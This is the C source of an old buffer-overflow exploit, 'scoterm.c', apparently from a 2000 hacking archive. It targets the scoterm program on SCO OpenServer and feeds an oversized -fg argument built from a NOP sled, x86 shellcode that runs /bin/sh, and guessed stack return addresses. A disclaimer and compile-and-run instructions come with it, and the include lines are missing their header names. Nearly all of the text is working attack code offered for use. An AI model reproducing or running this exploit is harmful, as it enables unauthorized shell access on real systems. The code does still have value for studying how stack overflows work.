/* First: I, Mac X, nor The members of The Arctic League will be held responsible for actions taken with or as a result of use of this program or information contained in it. This program is for informational and educational purposes only. By using it you agree to these terms. scoterm.c - overruns the buffer in scoterm to give a shell Works on most SCO Desktop/OpenServer 3.0 or OpenServer 5.0 and maybe some others. Based on the basic buffer overflow code. Shout-out 2 Aleph1 of cource :) Usage: gcc scoterm.c -o sco ./sco Written by Mac X of The Arctic League- The Arctic League- http://www.arctik.com */ #include #include #include #define DEFAULT_OFFSET 0 #define BUFFER_SIZE 1491 long get_esp(void) { __asm__("movl %esp,%eax\n"); } main(int argc, char **argv) { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2" "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0" "\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50" "\xeb\x18" "\xe8\xd8\xff\xff\xff" "/bin/sh" "\x01\x01\x01\x01" "\x02\x02\x02\x02" "\x03\x03\x03\x03" "\x9a\x04\x04\x04\x04\x07\x04"; int i, ofs=DEFAULT_OFFSET, bs=BUFFER_SIZE; if(argc>1) ofs=atoi(argv[1]); if(argc>2) bs=atoi(argv[2]); printf("Using offset of esp + %d (%x)\nBuffer size %d\n", ofs, get_esp()+ofs, bs); buff = malloc(4096); if(!buff) { printf("cant allocate memory\n"); exit(0); } ptr = buff; memset(ptr, 0x90, bs-strlen(execshell)); ptr += bs-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_esp() + ofs; ptr = (char *)addr_ptr; *ptr = 0; execl("/usr/bin/X11/scoterm", "scoterm", "-fg", buff, NULL); } /* www.hack.co.za [29 September 2000]*/